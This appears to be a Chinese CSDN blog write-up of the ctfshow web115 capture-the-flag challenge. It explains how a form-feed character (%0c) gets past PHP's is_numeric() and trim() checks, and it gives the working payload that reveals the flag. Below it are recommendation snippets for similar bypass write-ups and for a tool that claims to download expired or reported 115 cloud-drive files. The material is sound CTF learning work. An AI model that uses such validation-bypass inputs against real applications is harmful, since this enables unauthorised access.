ctfshow-web115(\f绕过is_numberic()+trim())

最新推荐文章于 2024-07-15 17:01:50 发布
最新推荐文章于 2024-07-15 17:01:50 发布
阅读量1.1k 收藏
点赞数 2
分类专栏: # 各平台题目
https://blog.csdn.net/qq_44657899
本文链接:https://blog.csdn.net/qq_44657899/article/details/109731923
版权 
 <?php

/*
# -*- coding: utf-8 -*-
# @Author: Firebasky
# @Date:   2020-09-16 11:25:09
# @Last Modified by:   h1xa
# @Last Modified time: 2020-10-01 15:08:19

*/

include('flag.php');
highlight_file(__FILE__);
error_reporting(0);
function filter($num){
    $num=str_replace("0x","1",$num);
    $num=str_replace("0","1",$num);
    $num=str_replace(".","1",$num);
    $num=str_replace("e","1",$num);
    $num=str_replace("+","1",$num);
    return $num;
}
$num=$_GET['num'];
if(is_numeric($num) and $num!=='36' and trim($num)!=='36' and filter($num)=='36'){
    if($num=='36'){
        echo $flag;
    }else{
        echo "hacker!!";
    }
}else{
    echo "hacker!!!";
} hacker!!!

在数字前加上空格,也会被is_numeric函数认为是数字:

<?php 
$a="\n1";
$b="\t1";
$c="\f1";
$d="\r1";
$e="\v1";
$f=" 1";
var_dump(is_numeric($a));//bool(true)
var_dump(is_numeric($b));//bool(true)
var_dump(is_numeric($c));//bool(true)
var_dump(is_numeric($d));//bool(true)
var_dump(is_numeric($e));//bool(true)
var_dump(is_numeric($f));//bool(true)

trim函数会过滤空格以及\n\r\t\v\0,但不会过滤\f

<?php 
$n=" \n\r\t\v\0  aaa  \f";
var_dump(trim($n));//aaa   \f
?>

在这里插入图片描述
payload;

/?num=%0c36
天问_Herbert555
关注
专栏目录
2021-09-01 网安实验-SQL注入-绕过is_numeric过滤
时光隧道
09-01 4万+
1.在收集信息的过程中发现备份文件.index.php.swp泄漏,我们拿到了源码。 记事本打开可以看到代码内容 经过分析得到以下信息: 注入点id是被is_numeric过滤后,插入到vote表里的。把注入查询语句插入到vote表里,然后又从vote表里取出,形成二次注入。可以考虑用十六进制或者二进制绕过is_numeric,形成SQL注入。 这里我们使用火狐的插件hackbar就可以了(在浏览器工具栏的【工具】中),随便选择一部电影并提交 : 按照图中的顺序将payload进行十六进制处理(前面记
SQL注入之绕过is_numeric过滤
ChuMeng1999的博客
10-29 1123
本实验中的is_numeric()函数用于检测变量是否为数字或数字字符串。如果将二进制或十六进制数据传递至is_numeric()函数,则也会返回为true,即被is_numeric()函数检测是数字。现在,我们进行测试。编写is_numeric.php文件,并将以下代码输入后,保存。再执行该程序,可得到结果:bool(true)。php!$(!$代表上一条命令的最后一个参数,即is_numeric.php)
CTF中常见的黑魔法
L1ni01
10-20 2346
CTF中常见的黑魔法 入门级别 不是很全,慢慢总结 1.sha1和md5 要求变量原值不同但md5或sha1相同的情况下 1.0e开头的全部相等(==判断) 240610708 和 QNKCDZO md5值类型相似,但并不相同,在”==”相等操作符的运算下,结果返回了true. Md5和sha1一样 2.利用数组绕过(===判断) Md5和sha1对一个数组进行加密将返回NULL;而NULL===NULL返回true,所以可绕过判断。 2.strcmp函数的绕过 strcmp 的参数只能是字符串,当我们传入
CTFshow php特性 web115
Kradress的博客
12-16 300
目录源码思路题解总结 源码 <?php /* # -*- coding: utf-8 -*- # @Author: Firebasky # @Date: 2020-09-16 11:25:09 # @Last Modified by: h1xa # @Last Modified time: 2020-10-01 15:08:19 */ include('flag.php'); highlight_file(__FILE__); error_reporting(0); function
ctfshow-web入门-php特性(web109-web115
最新发布
Welcome To Myon'Blog !
07-15 1150
php 中查看目录的函数有:scandir()、golb()、dirname()、basename()、realpath()、getcwd() ,其中 scandir()、golb() 、dirname()、basename()、realpath() 都需要给定参数,而 getcwd() 不需要参数,getchwd() 函数会返回当前工作目录。对于 trim() 函数会去除空格( %20)、制表符(%09)、换行符(%0a)、回车符(%0d)、空字节符(%00)、垂直制表符(%0b),
ctfshow php特性 web89-web115 web123-150wp
mumuzi的博客
02-01 5289
皮爱吃皮特性
CTFshow web(php特性113-115&123)
csjjjd的博客
02-05 2353
这道题目如果做不出来说明你文件包含那边学的不够好,可以看看我之前写的一篇文章,可以高效提升这方面的知识。这个函数通常用于处理用户输入的字符串,以确保不会因为开头或结尾的空白字符而导致不必要的问题。但是这里把convert搬了,那就不要转换器直接返璞归真。这里最主要有一个大漏洞,看到了就应该立刻反应过来了!echo "师傅们居然tql都是非预期 哼!这道题目没有禁用filter,那就直接拿下了。这里开始小小审计一下代码。
廖雪峰trim()函数练习的小坑
qq_42961707的博客
01-08 302
在廖雪峰python教学网站练习时,接触到了切片部分,题目如下: 利用切片操作,实现一个trim()函数,去除字符串首尾的空格,注意不要调用str的strip()方法。 于是我写了如下代码: def trim(s): while s[0] == " " and len(s) &gt; 0: s = s[1:] while s[-1] == " " and len(s...
php is_numberic函数造成的SQL注入漏洞
01-21
一、is_numberic函数简介国内一部分CMS程序里面有用到过is_numberic函数,我们先看看这个函数的结构bool is_numeric (mixed $var)如果 var 是数字和数字字符串则返回 TRUE,否则返回 FALSE。二、函数是否安全接下来...
is_numeric漏洞分析
weixin_30785593的博客
04-20 1823
2014年,PHP中is_numeric函数十六进制绕过漏洞引发了一次安全问题接下来,我们来分析一下这个漏洞的原理函数介绍:is_numeric — 检测变量是否为数字或数字字符串。函数原型:bool is_numeric ( mixed $var )如果 var 是数字或数字字符串则返回 TRUE,否则返回 FALSE。举例说明:例程1:<?php$v = is_numeric ('586...
【强制下载115网盘过期文件及被举报文件】115网盘解析器
01-03
最近115网盘上好多给力视频资源都无法下载,豆芽就分享popok编写的一个破解115网盘链接解析工具。即使115网盘资源过期或无可用的下载地址,你也可以用它来提取出直接下载地址,用迅雷等下载软件高速下载,当然不仅是视频资源,只要是115网盘资源都可以解析下载。 PS: 1、打开时提示“无法创建ActiveX组件”的同学请下载安装msxml6.msi 2、Win7或Vista如果打不开,可以试试右键用“管理员方式”运行 3、关于杀软报毒的问题,反正我是没那么无聊,就看你信不信了 4、关于迅雷续传,重新提取一次下载地址,建立新的迅雷任务,暂停,把原来下到一半的2个文件替换掉新任务的,然后下载新的任务,就会发现进度回来了 软件信息 软件名称:115解析器 软件版本:0917 软件大小:172 KB 运行环境:Windows 2000/XP/2003/Vista/win7/2008 软件语言:简体中文 文件名:115解析0917.exe CRC32: 8B952E77 MD5: B188E8E755B4461AF2AC16AC334892EB SHA-1: 532B89DA5BAF350D917DC582757DAC5973755442
VulnCTF的练习教室v1.0-------WEB-----------第四题【绕过and后面的is_numeric()】
大方子
10-05 2302
==================================== 个人收获: 1.在php中赋值运算比AND和OR高,但是低于&amp;&amp;和||,利用这个特性可以绕过     =====================================   题目:   查看下源代码 然后我们传入a和b,直接得到flag   这题就是送分题,主要看下...
php is numeric绕过,is_numerictrim导致的判断绕过
weixin_33558958的博客
04-02 771
前两天做了一道前段时间的三个白帽,遇到了一个有趣的php黑魔法…题目的源码首先是这样的123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657...
ctfshow学习记录-web入门(php特性109-115&123&125-126)
龟速更新的九某人
07-19 1390
ctfshow学习记录-web入门(php特性web109-115&web123&web125-126)
ctfshow--web入门(web101--web115&web123&web125-web133)
qing_chuan_的博客
06-08 1081
v2$v3反射,通俗来讲就是可以通过一个对象来获取所属类的具体内容,php中内置了强大的反射API:ReflectionClass:一个反射类,功能十分强大,内置了各种获取类信息的方法,创建方式为new ReflectionClass(str 类名),可以用echo new ReflectionClass(‘className’)打印类的信息。ReflectionObject:另一个反射类,创建方式为new ReflectionObject(对象名)。
2023年第四届 “赣网杯” 网络安全大赛 gwb-web3 Write UP【PHP 临时函数名特性 + 绕过trim函数】
Specif1c的博客
12-18 2384
从GET请求中获取名为’func’的参数,然后使用trim函数去除首尾空格,并将结果赋给变量$func。:从GET请求中获取名为’pass’的参数,然后使用trim函数去除首尾空格,并将结果赋给变量 $password。:在条件成立时,定义了一个名为youwin的函数,它的作用是输出名为’/flag’的文件的内容,使用了file_get_contents函数。:定义了一个名为hint的函数,它的作用是显示当前文件的源代码,使用了show_source函数。:调用根据’func’参数确定的函数。
CTFShow-PHP特性篇(一) (web89-web115)
lonmar的博客
12-03 2042
文章目录web89web90web91web92web93web94web95web96web97web98web99web100web 101 web89 数组绕过 原理: 且 preg_math()传入数组参数也会直接返回0 web90 ?num=0x117c 0x117c会转为4476 还是考察intval()函数 intval( mixed $var[, int $base = 10] ) : int var 要转换成 integer 的数量值 base 转化所使用的进制 Note: 如果
文件上传绕过方法汇总
weixin_48776804的博客
01-28 1281
文件上传绕过方法汇总
numberic:number
09-01
引用中提到了android:numberic,它是一个用于在Android应用程序中接受数字输入的属性。该属性用于限制用户在文本框中只能输入数字值。这意味着用户在该文本框中无法输入除数字之外的其他字符,包括字母、符号和空格。使用android:numberic可以确保用户只能输入数字,从而保证输入的准确性和有效性。<span class="em">1</span><span class="em">2</span> #### 引用[.reference_title] - *1* [Android编程之TextView的字符过滤功能分析](https://download.csdn.net/download/weixin_38626075/14019658)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] - *2* [程序员英语5:number和digit都是数字,有什么区别?](https://blog.csdn.net/weixin_64612659/article/details/122657192)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值